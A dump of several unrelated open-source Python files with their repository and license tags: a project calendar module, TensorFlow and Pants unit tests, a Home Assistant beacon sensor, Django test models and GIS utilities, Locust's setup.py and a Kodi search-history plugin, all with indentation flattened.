#@+node:<< class _WorkingDateBase declarations >>
timetuple = True
STR_FORMAT = "%x %H:%M"
_minutes = _Minutes
__slots__ = ()
#@-node:<< class _WorkingDateBase declarations >>
#@nl
#@ @+others
#@+node:__new__
def __new__(cls, src):
#cls.__bases__[0] is the base of
#the calendar specific StartDate and EndDate
if isinstance(src, cls.__bases__[0]) or type(src) in (int, float):
return _CalendarItem.__new__(cls, src)
src = cls.calendar.from_datetime(to_datetime(src))
return _CalendarItem.__new__(cls, src)
#@-node:__new__
#@+node:__repr__
def __repr__(self):
return self.strftime()
#@-node:__repr__
#@+node:to_datetime
def to_datetime(self):
return self.to_starttime()
#@-node:to_datetime
#@+node:to_starttime
def to_starttime(self):
return self.calendar.to_starttime(self)
#@-node:to_starttime
#@+node:to_endtime
def to_endtime(self):
return self.calendar.to_endtime(self)
#@-node:to_endtime
#@+node:__cmp__
def __cmp__(self, other):
return cmp(int(self), int(self.__class__(other)))
#@-node:__cmp__
#@+node:__add__
def __add__(self, other):
try:
return self.__class__(int(self) + int(self._minutes(other)))
except ValueError, e:
raise e
except:
return NotImplemented
#@-node:__add__
#@+node:__sub__
def __sub__(self, other):
if isinstance(other, (datetime.timedelta, str, _Minutes)):
try:
other = self._minutes(other)
except:
pass
if isinstance(other, self._minutes):
return self.__class__(int(self) - int(other))
try:
return self._minutes(int(self) - int(self.__class__(other)))
except:
return NotImplemented
#@-node:__sub__
#@+node:strftime
def strftime(self, format=None):
return strftime(self.to_datetime(), format or self.STR_FORMAT)
#@-node:strftime
#@-others
#@-node:class _WorkingDateBase
#@+node:class Calendar
class Calendar(object):
"""
A calendar to specify working times and vacations.
The calendar's epoch starts at 1.1.1979
"""
#@ << declarations >>
#@+node:<< declarations >>
# january the first must be a monday
EPOCH = datetime.datetime(1979, 1, 1)
minimum_time_unit = DEFAULT_MINIMUM_TIME_UNIT
working_days_per_week = DEFAULT_WORKING_DAYS_PER_WEEK
working_days_per_month = DEFAULT_WORKING_DAYS_PER_MONTH
working_days_per_year = DEFAULT_WORKING_DAYS_PER_YEAR
working_hours_per_day = DEFAULT_WORKING_HOURS_PER_DAY
now = EPOCH
#@-node:<< declarations >>
#@nl
#@ @+others
#@+node:__init__
def __init__(self):
self.time_spans = ()
self._dt_num_can = ()
self._num_dt_can = ()
self.working_times = { }
self._recalc_working_time()
self._make_classes()
#@-node:__init__
#@+node:__or__
def __or__(self, other):
if isinstance(other, Calendar):
return union(self, other)
return NotImplemented
#@nonl
#@-node:__or__
#@+node:clone
def clone(self):
result = Calendar()
result.working_times = self.working_times.copy()
result.time_spans = self.time_spans
result._recalc_working_time()
result._build_mapping()
return result
#@nonl
#@-node:clone
#@+node:set_working_days
def set_working_days(self, day_range, trange, *further_tranges):
"""
Sets the working days of a calendar.
day_range is a string of day abbreviations like 'mon, tue';
trange and further_tranges are time range strings like
'8:00-10:00'
"""
time_ranges = [ trange ] + list(further_tranges)
time_ranges = filter(bool, map(to_time_range, time_ranges))
days = _to_days(day_range)
for k in days.keys():
self.working_times[k] = time_ranges
self._recalc_working_time()
self._build_mapping()
#@-node:set_working_days
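# For illustration (a hypothetical configuration; the time-range parsing is
# done by to_time_range, defined earlier in this file):
#
#   cal = Calendar()
#   cal.set_working_days("mon, tue, wed, thu, fri", "8:00-12:00", "13:00-17:00")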
#@+node:set_vacation
def set_vacation(self, value):
"""
Sets vacation time.
value is either a datetime literal or
a sequence of items, each of which is
a datetime literal or a pair of datetime literals
"""
self.time_spans = _add_to_time_spans(self.time_spans, value, True)
self._build_mapping()
#@-node:set_vacation
#@+node:set_extra_work
def set_extra_work(self, value):
"""
Sets extra working time
value is either a datetime literal or
a sequence of items, each of which is
a datetime literal or a pair of datetime literals
"""
self.time_spans = _add_to_time_spans(self.time_spans, value, False)
self._build_mapping()
#@-node:set_extra_work
#@+node:from_datetime
def from_datetime(self, value):
assert(isinstance(value, datetime.datetime))
delta = value - self.EPOCH
days = delta.days
minutes = delta.seconds / 60
# calculate the weektime
weeks = days / 7
wtime = self.week_time * weeks
# calculate the daytime
days %= 7
dtime = sum(self.day_times[:days])
# calculate the minute time
slots = self.working_times.get(days, DEFAULT_WORKING_DAYS[days])
mtime = 0
for start, end in slots:
if minutes > end:
mtime += end - start
else:
if minutes > start:
mtime += minutes - start
break
result = wtime + dtime + mtime
# map exceptional timespans
dt_num_can = self._dt_num_can
pos = bisect.bisect(dt_num_can, (value,)) - 1
if pos >= 0:
start, end, nstart, nend, cend = dt_num_can[pos]
if value < end:
if nstart < nend:
delta = value - start
delta = delta.days * 24 * 60 + delta.seconds / 60
result = nstart + delta
else:
result = nstart
else:
result += (nend - cend) # == (result - cend) + nend
return result
#@-node:from_datetime
#@+node:split_time
def split_time(self, value):
#map exceptional timespans
num_dt_can = self._num_dt_can
pos = bisect.bisect(num_dt_can, (value, sys.maxint)) - 1
if pos >= 0:
nstart, nend, start, end, cend = num_dt_can[pos]
if value < nend:
value = start + datetime.timedelta(minutes=value - nstart)
delta = value - self.EPOCH
return delta.days / 7, delta.days % 7, delta.seconds / 60, -1
else:
value += (cend - nend) # (value - nend + cend)
#calculate the weeks since the epoch
weeks = value / self.week_time
value %= self.week_time
#calculate the remaining days
days = 0
for day_time in self.day_times:
if value < day_time: break
value -= day_time
days += 1
#calculate the remaining minutes
minutes = 0
slots = self.working_times.get(days, DEFAULT_WORKING_DAYS[days])
index = 0
for start, end in slots:
delta = end - start
if delta > value:
minutes = start + value
break
else:
value -= delta
index += 1
return weeks, days, minutes, index
#@-node:split_time
#@+node:to_starttime
def to_starttime(self, value):
weeks, days, minutes, index = self.split_time(value)
return self.EPOCH + datetime.timedelta(weeks=weeks,
days=days,
minutes=minutes)
#@-node:to_starttime
#@+node:to_endtime
def to_endtime(self, value):
return self.to_starttime(value - 1) + datetime.timedelta(minutes=1)
#@-node:to_endtime
#@+node:get_working_times
def get_working_times(self, day):
return self.working_times.get(day, DEFAULT_WORKING_DAYS[day])
#@-node:get_working_times
#@+node:_build_mapping
def _build_mapping(self):
self._dt_num_can = self._num_dt_can = ()
dt_num_can = []
num_dt_can = []
delta = self.Minutes()
for start, end, is_free in self.time_spans:
cstart = self.StartDate(start)
cend = self.EndDate(end)
nstart = cstart + delta
if not is_free:
d = end - start
d = d.days * 24 * 60 + d.seconds / 60
nend = nstart + d
else:
nend = nstart
delta += (nend - nstart) - (cend - cstart)
dt_num_can.append((start, end, nstart, nend, cend))
num_dt_can.append((nstart, nend, start, end, cend))
self._dt_num_can = tuple(dt_num_can)
self._num_dt_can = tuple(num_dt_can)
#@-node:_build_mapping
#@+node:_recalc_working_time
def _recalc_working_time(self):
def slot_sum_time(day):
slots = self.working_times.get(day, DEFAULT_WORKING_DAYS[day])
return sum(map(lambda slot: slot[1] - slot[0], slots))
self.day_times = map(slot_sum_time, range(0, 7))
self.week_time = sum(self.day_times)
#@-node:_recalc_working_time
#@+node:_make_classes
def _make_classes(self):
# ensure that the classes are instance specific
class minutes(_Minutes):
calendar = self
__slots__ = ()
class db(_WorkingDateBase):
calendar = self
_minutes = minutes
__slots__ = ()
class wdt(db): __slots__ = ()
class edt(db):
__slots__ = ()
def to_datetime(self):
return self.to_endtime()
self.Minutes, self.StartDate, self.EndDate = minutes, wdt, edt
self.WorkingDate = self.StartDate
#@-node:_make_classes
#@-others
_default_calendar = Calendar()
WorkingDate = _default_calendar.WorkingDate
StartDate = _default_calendar.StartDate
EndDate = _default_calendar.EndDate
Minutes = _default_calendar.Minutes
#@-node:class Calendar
#@-others
if __name__ == '__main__':
cal = Calendar()
start = EndDate("10.1.2005")
delay = Minutes("4H")
start2 = cal.StartDate(start)
start3 = cal.StartDate("10.1.2005")
#@-node:@file pcalendar.py
#@-leo
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
jart/tensorflow
|
tensorflow/python/kernel_tests/weights_broadcast_test.py
|
130
|
9711
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for broadcast rules."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes as dtypes_lib
from tensorflow.python.framework import errors_impl
from tensorflow.python.framework import ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import weights_broadcast_ops
from tensorflow.python.platform import test
def _test_values(shape):
return np.reshape(np.cumsum(np.ones(shape), dtype=np.int32), newshape=shape)
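# For reference: _test_values fills the requested shape with a running count
# starting at 1, e.g. _test_values((2, 3)) yields [[1, 2, 3], [4, 5, 6]].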
class AssertBroadcastableTest(test.TestCase):
def setUp(self):
ops.reset_default_graph()
def _test_valid(self, weights, values):
static_op = weights_broadcast_ops.assert_broadcastable(
weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.assert_broadcastable(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
static_op.run()
dynamic_op.run(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
})
def testScalar(self):
self._test_valid(weights=5, values=_test_values((3, 2, 4)))
def test1x1x1(self):
self._test_valid(
weights=np.asarray((5,)).reshape((1, 1, 1)),
values=_test_values((3, 2, 4)))
def test1x1xN(self):
self._test_valid(
weights=np.asarray((5, 7, 11, 3)).reshape((1, 1, 4)),
values=_test_values((3, 2, 4)))
def test1xNx1(self):
self._test_valid(
weights=np.asarray((5, 11)).reshape((1, 2, 1)),
values=_test_values((3, 2, 4)))
def test1xNxN(self):
self._test_valid(
weights=np.asarray((5, 7, 11, 3, 2, 13, 7, 5)).reshape((1, 2, 4)),
values=_test_values((3, 2, 4)))
def testNx1x1(self):
self._test_valid(
weights=np.asarray((5, 7, 11)).reshape((3, 1, 1)),
values=_test_values((3, 2, 4)))
def testNx1xN(self):
self._test_valid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3)).reshape((3, 1, 4)),
values=_test_values((3, 2, 4)))
def testNxNxN(self):
self._test_valid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4)),
values=_test_values((3, 2, 4)))
def _test_invalid(self, weights, values):
error_msg = 'weights can not be broadcast to values'
with self.assertRaisesRegexp(ValueError, error_msg):
weights_broadcast_ops.assert_broadcastable(weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.assert_broadcastable(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
with self.assertRaisesRegexp(errors_impl.OpError, error_msg):
dynamic_op.run(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
})
def testInvalid1(self):
self._test_invalid(weights=np.asarray((5,)), values=_test_values((3, 2, 4)))
def testInvalid1x1(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12)).reshape((3, 2)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12, 7, 5)).reshape((2, 4)),
values=_test_values((3, 2, 4)))
def testInvalidOnesExtraDim(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1, 1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4, 1)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((1, 3, 2, 4)),
values=_test_values((3, 2, 4)))
class BroadcastWeightsTest(test.TestCase):
def setUp(self):
ops.reset_default_graph()
def _test_valid(self, weights, values, expected):
static_op = weights_broadcast_ops.broadcast_weights(
weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.broadcast_weights(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
self.assertAllEqual(expected, static_op.eval())
self.assertAllEqual(expected, dynamic_op.eval(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
}))
def testScalar(self):
self._test_valid(
weights=5,
values=_test_values((3, 2, 4)),
expected=5 * np.ones((3, 2, 4)))
def test1x1x1(self):
self._test_valid(
weights=np.asarray((5,)).reshape((1, 1, 1)),
values=_test_values((3, 2, 4)),
expected=5 * np.ones((3, 2, 4)))
def test1x1xN(self):
weights = np.asarray((5, 7, 11, 3)).reshape((1, 1, 4))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(3, 2, 1)))
def test1xNx1(self):
weights = np.asarray((5, 11)).reshape((1, 2, 1))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(3, 1, 4)))
def test1xNxN(self):
weights = np.asarray((5, 7, 11, 3, 2, 13, 7, 5)).reshape((1, 2, 4))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(3, 1, 1)))
def testNx1x1(self):
weights = np.asarray((5, 7, 11)).reshape((3, 1, 1))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(1, 2, 4)))
def testNx1xN(self):
weights = np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3)).reshape((3, 1, 4))
self._test_valid(
weights=weights,
values=_test_values((3, 2, 4)),
expected=np.tile(weights, reps=(1, 2, 1)))
def testNxNxN(self):
weights = np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4))
self._test_valid(
weights=weights, values=_test_values((3, 2, 4)), expected=weights)
def _test_invalid(self, weights, values):
error_msg = 'weights can not be broadcast to values'
with self.assertRaisesRegexp(ValueError, error_msg):
weights_broadcast_ops.broadcast_weights(weights=weights, values=values)
weights_placeholder = array_ops.placeholder(dtypes_lib.float32)
values_placeholder = array_ops.placeholder(dtypes_lib.float32)
dynamic_op = weights_broadcast_ops.broadcast_weights(
weights=weights_placeholder, values=values_placeholder)
with self.test_session():
with self.assertRaisesRegexp(errors_impl.OpError, error_msg):
dynamic_op.eval(feed_dict={
weights_placeholder: weights,
values_placeholder: values,
})
def testInvalid1(self):
self._test_invalid(weights=np.asarray((5,)), values=_test_values((3, 2, 4)))
def testInvalid1x1(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12)).reshape((3, 2)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatch(self):
self._test_invalid(
weights=np.asarray((5, 7, 11, 3, 2, 12, 7, 5)).reshape((2, 4)),
values=_test_values((3, 2, 4)))
def testInvalidOnesExtraDim(self):
self._test_invalid(
weights=np.asarray((5,)).reshape((1, 1, 1, 1)),
values=_test_values((3, 2, 4)))
def testInvalidPrefixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((3, 2, 4, 1)),
values=_test_values((3, 2, 4)))
def testInvalidSuffixMatchExtraDim(self):
self._test_invalid(
weights=np.asarray((
5, 7, 11, 3, 2, 12, 7, 5, 2, 17, 11, 3,
2, 17, 11, 3, 5, 7, 11, 3, 2, 12, 7, 5)).reshape((1, 3, 2, 4)),
values=_test_values((3, 2, 4)))
if __name__ == '__main__':
test.main()
|
apache-2.0
|
slyphon/pants
|
tests/python/pants_test/backend/core/tasks/test_paths.py
|
6
|
5072
|
# coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from pants.backend.core.tasks.paths import Path, Paths
from pants.base.exceptions import TaskError
from pants_test.tasks.task_test_base import ConsoleTaskTestBase
class PathsTest(ConsoleTaskTestBase):
@classmethod
def task_type(cls):
return Paths
def test_only_one_target(self):
target_a = self.make_target('a')
with self.assertRaises(TaskError) as cm:
self.execute_console_task(targets=[target_a])
self.assertIn('Specify two targets please', str(cm.exception))
self.assertIn('found 1', str(cm.exception))
def test_three_targets(self):
target_a = self.make_target('a')
target_b = self.make_target('b')
target_c = self.make_target('c')
with self.assertRaises(TaskError) as cm:
self.execute_console_task(targets=[target_a, target_b, target_c])
self.assertIn('Specify two targets please', str(cm.exception))
self.assertIn('found 3', str(cm.exception))
def test_path_dependency_first_finds_no_paths(self):
# Not sure if I like this behavior, but adding this test to document it
target_b = self.make_target('b')
target_a = self.make_target('a', dependencies=[target_b])
self.assert_console_output('Found 0 paths', targets=[target_b, target_a])
def test_single_edge_path(self):
target_b = self.make_target('b')
target_a = self.make_target('a', dependencies=[target_b])
self.assert_console_output('Found 1 path',
'',
'\t[a, b]',
targets=[target_a, target_b])
def test_same_target_path(self):
target_b = self.make_target('b')
self.assert_console_output('Found 1 path',
'',
'\t[b]',
targets=[target_b, target_b])
def test_two_paths(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_b])
target_a = self.make_target('a', dependencies=[target_inner_1, target_inner_2])
self.assert_console_output('Found 2 paths',
'',
'\t[a, inner1, b]',
'\t[a, inner2, b]',
targets=[target_a, target_b])
def test_cycle_no_path(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1')
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1])
target_a = self.make_target('a', dependencies=[target_inner_1])
target_inner_1.inject_dependency(target_inner_2.address)
self.assert_console_output('Found 0 paths',
targets=[target_a, target_b])
def test_cycle_path(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1, target_b])
target_inner_1.inject_dependency(target_inner_2.address)
target_a = self.make_target('a', dependencies=[target_inner_1])
self.assert_console_output('Found 3 paths',
'',
'\t[a, inner1, b]',
'\t[a, inner1, inner2, b]',
'\t[a, inner1, inner2, inner1, b]',
targets=[target_a, target_b])
def test_overlapping_paths(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1])
target_a = self.make_target('a', dependencies=[target_inner_1, target_inner_2])
self.assert_console_output('Found 2 paths',
'',
'\t[a, inner1, b]',
'\t[a, inner2, inner1, b]',
targets=[target_a, target_b])
class PathTest(ConsoleTaskTestBase):
@classmethod
def task_type(cls):
return Path
def test_only_returns_first_path(self):
target_b = self.make_target('b')
target_inner_1 = self.make_target('inner1', dependencies=[target_b])
target_inner_2 = self.make_target('inner2', dependencies=[target_inner_1])
target_a = self.make_target('a', dependencies=[target_inner_1, target_inner_2])
self.assert_console_output('[a, inner1, b]',
targets=[target_a, target_b])
def test_when_no_path(self):
target_b = self.make_target('b')
target_a = self.make_target('a')
self.assert_console_output('No path found from a to b!',
targets=[target_a, target_b])
|
apache-2.0
|
GenericStudent/home-assistant
|
homeassistant/components/eddystone_temperature/sensor.py
|
16
|
5640
|
"""
Read temperature information from Eddystone beacons.
Your beacons must be configured to transmit UID (for identification) and TLM
(for temperature) frames.
"""
import logging
# pylint: disable=import-error
from beacontools import BeaconScanner, EddystoneFilter, EddystoneTLMFrame
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
STATE_UNKNOWN,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
CONF_BEACONS = "beacons"
CONF_BT_DEVICE_ID = "bt_device_id"
CONF_INSTANCE = "instance"
CONF_NAMESPACE = "namespace"
BEACON_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAMESPACE): cv.string,
vol.Required(CONF_INSTANCE): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_BT_DEVICE_ID, default=0): cv.positive_int,
vol.Required(CONF_BEACONS): vol.Schema({cv.string: BEACON_SCHEMA}),
}
)
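# A minimal example configuration this schema would accept (illustrative only;
# the beacon identifiers are hypothetical -- namespace must be 20 and instance
# 12 hex characters):
#
#   sensor:
#     - platform: eddystone_temperature
#       bt_device_id: 0
#       beacons:
#         living_room:
#           namespace: "112233445566778899aa"
#           instance: "000000000001"
#           name: "Living Room"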
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Validate configuration, create devices and start monitoring thread."""
bt_device_id = config.get(CONF_BT_DEVICE_ID)
beacons = config.get(CONF_BEACONS)
devices = []
for dev_name, properties in beacons.items():
namespace = get_from_conf(properties, CONF_NAMESPACE, 20)
instance = get_from_conf(properties, CONF_INSTANCE, 12)
name = properties.get(CONF_NAME, dev_name)
if instance is None or namespace is None:
_LOGGER.error("Skipping %s", dev_name)
continue
devices.append(EddystoneTemp(name, namespace, instance))
if devices:
mon = Monitor(hass, devices, bt_device_id)
def monitor_stop(_service_or_event):
"""Stop the monitor thread."""
_LOGGER.info("Stopping scanner for Eddystone beacons")
mon.stop()
def monitor_start(_service_or_event):
"""Start the monitor thread."""
_LOGGER.info("Starting scanner for Eddystone beacons")
mon.start()
add_entities(devices)
mon.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, monitor_stop)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, monitor_start)
else:
_LOGGER.warning("No devices were added")
def get_from_conf(config, config_key, length):
"""Retrieve value from config and validate length."""
string = config.get(config_key)
if len(string) != length:
_LOGGER.error(
"Error in configuration parameter %s: Must be exactly %d "
"bytes. Device will not be added",
config_key,
length / 2,
)
return None
return string
class EddystoneTemp(Entity):
"""Representation of a temperature sensor."""
def __init__(self, name, namespace, instance):
"""Initialize a sensor."""
self._name = name
self.namespace = namespace
self.instance = instance
self.bt_addr = None
self.temperature = STATE_UNKNOWN
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self.temperature
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return TEMP_CELSIUS
@property
def should_poll(self):
"""Return the polling state."""
return False
class Monitor:
"""Continuously scan for BLE advertisements."""
def __init__(self, hass, devices, bt_device_id):
"""Construct interface object."""
self.hass = hass
# List of beacons to monitor
self.devices = devices
# Number of the bt device (hciX)
self.bt_device_id = bt_device_id
def callback(bt_addr, _, packet, additional_info):
"""Handle new packets."""
self.process_packet(
additional_info["namespace"],
additional_info["instance"],
packet.temperature,
)
device_filters = [EddystoneFilter(d.namespace, d.instance) for d in devices]
self.scanner = BeaconScanner(
callback, bt_device_id, device_filters, EddystoneTLMFrame
)
self.scanning = False
def start(self):
"""Continuously scan for BLE advertisements."""
if not self.scanning:
self.scanner.start()
self.scanning = True
else:
_LOGGER.debug("start() called, but scanner is already running")
def process_packet(self, namespace, instance, temperature):
"""Assign temperature to device."""
_LOGGER.debug(
"Received temperature for <%s,%s>: %d", namespace, instance, temperature
)
for dev in self.devices:
if dev.namespace == namespace and dev.instance == instance:
if dev.temperature != temperature:
dev.temperature = temperature
dev.schedule_update_ha_state()
def stop(self):
"""Signal runner to stop and join thread."""
if self.scanning:
_LOGGER.debug("Stopping...")
self.scanner.stop()
_LOGGER.debug("Stopped")
self.scanning = False
else:
_LOGGER.debug("stop() called but scanner was not running")
|
apache-2.0
|
alexmandujano/django
|
tests/admin_validation/models.py
|
192
|
1332
|
"""
Tests of ModelAdmin validation logic.
"""
from django.db import models
from django.utils.encoding import python_2_unicode_compatible
class Album(models.Model):
title = models.CharField(max_length=150)
@python_2_unicode_compatible
class Song(models.Model):
title = models.CharField(max_length=150)
album = models.ForeignKey(Album)
original_release = models.DateField(editable=False)
class Meta:
ordering = ('title',)
def __str__(self):
return self.title
def readonly_method_on_model(self):
# does nothing
pass
class TwoAlbumFKAndAnE(models.Model):
album1 = models.ForeignKey(Album, related_name="album1_set")
album2 = models.ForeignKey(Album, related_name="album2_set")
e = models.CharField(max_length=1)
class Author(models.Model):
name = models.CharField(max_length=100)
class Book(models.Model):
name = models.CharField(max_length=100)
subtitle = models.CharField(max_length=100)
price = models.FloatField()
authors = models.ManyToManyField(Author, through='AuthorsBooks')
class AuthorsBooks(models.Model):
author = models.ForeignKey(Author)
book = models.ForeignKey(Book)
class State(models.Model):
name = models.CharField(max_length=15)
class City(models.Model):
state = models.ForeignKey(State)
|
bsd-3-clause
|
edx/locust
|
setup.py
|
5
|
1581
|
# encoding: utf-8
from setuptools import setup, find_packages, Command
import sys, os
version = '0.7.2'
class Unit2Discover(Command):
user_options = []
def initialize_options(self):
pass
def finalize_options(self):
pass
def run(self):
import sys, subprocess
basecmd = ['unit2', 'discover']
errno = subprocess.call(basecmd)
raise SystemExit(errno)
setup(
name='locustio',
version=version,
description="Website load testing framework",
long_description="""Locust is a python utility for doing easy, distributed load testing of a web site""",
classifiers=[
"Topic :: Software Development :: Testing :: Traffic Generation",
"Development Status :: 4 - Beta",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Intended Audience :: Developers",
"Intended Audience :: System Administrators",
],
keywords='',
author='Jonatan Heyman, Carl Bystrom, Joakim Hamrén, Hugo Heyman',
author_email='',
url='http://locust.io',
license='MIT',
packages=find_packages(exclude=['ez_setup', 'examples', 'tests']),
include_package_data=True,
zip_safe=False,
install_requires=["gevent>=1.0.1", "flask>=0.10.1", "requests>=2.4.1", "msgpack-python>=0.4.2"],
tests_require=['unittest2', 'mock', 'pyzmq'],
entry_points={
'console_scripts': [
'locust = locust.main:main',
]
},
test_suite='unittest2.collector',
)
|
mit
|
dandygithub/kodi
|
addons/script.module.dandy.search.history/plugin.py
|
1
|
2321
|
# -*- coding: utf-8 -*-
# Writer (c) 2019, dandy
# Rev. 1.0.0
# Licence: GPL v.3: http://www.gnu.org/copyleft/gpl.html
import sys
import xbmc
import xbmcaddon
import xbmcplugin
import xbmcgui
import XbmcHelpers as common
import resources.lib.SearchHistory as history
ID = 'script.module.dandy.search.history'
ADDON = xbmcaddon.Addon(ID)
PATH = ADDON.getAddonInfo('path')
HANDLE = int(sys.argv[1]) if (len(sys.argv) > 1) else None
PARAMS = sys.argv[2] if (len(sys.argv) > 2) else None
ICON = ADDON.getAddonInfo('icon')
def exist_us():
"""Check whether the plugin.video.united.search addon is installed."""
try:
xbmcaddon.Addon("plugin.video.united.search")
return True
except:
return False
def list_items():
words = history.get_history()
exist = exist_us()
for word in reversed(words):
if (exist == True):
uri = "plugin://plugin.video.united.search/?action=search&keyword=%s" % word
item = xbmcgui.ListItem(word, iconImage=ICON, thumbnailImage=ICON)
commands = []
uricmd = sys.argv[0] + '?mode=delete&keyword=%s' % word
commands.append(("[COLOR=orange]Delete[/COLOR] item", "Container.Update(%s)" % (uricmd), ))
item.addContextMenuItems(commands)
else:
uri = sys.argv[0] + '?mode=delete&keyword=%s' % word
item = xbmcgui.ListItem(word, iconImage=ICON, thumbnailImage=ICON)
xbmcplugin.addDirectoryItem(HANDLE, uri, item, False)
xbmcplugin.endOfDirectory(HANDLE, True)
def search_by_us(keyword):
uricmd = "plugin://plugin.video.united.search/?action=search&keyword=%s" % keyword
xbmc.executebuiltin("ActivateWindow(videos,%s)" % uricmd)
#xbmc.executebuiltin("Container.Update(%s)" % uricmd)
def delete_item(keyword):
if (xbmcgui.Dialog().yesno("", "", "Delete item from history?") == True):
words = history.delete_from_history(keyword)
xbmc.executebuiltin("Container.Update(%s)" % sys.argv[0])
def main():
params = common.getParameters(PARAMS)
mode = params['mode'] if 'mode' in params else None
keyword = params['keyword'] if 'keyword' in params else None
if (mode == "search"):
search_by_us(keyword)
if (mode == "delete"):
delete_item(keyword)
elif (mode is None):
list_items()
if __name__ == '__main__':
main()
|
gpl-3.0
|
haroldl/homeworklog
|
django/contrib/gis/db/backends/util.py
|
377
|
1749
|
"""
A collection of utility routines and classes used by the spatial
backends.
"""
def gqn(val):
"""
The geographic quote name function; used for quoting tables and
geometries (they use single rather than the double quotes of the
backend quotename function).
"""
if isinstance(val, basestring):
if isinstance(val, unicode): val = val.encode('ascii')
return "'%s'" % val
else:
return str(val)
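# Illustrative behavior (not part of the original module):
#
#   gqn('NAD83')   # -> "'NAD83'"
#   gqn(4326)      # -> '4326'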
class SpatialOperation(object):
"""
Base class for generating spatial SQL.
"""
sql_template = '%(geo_col)s %(operator)s %(geometry)s'
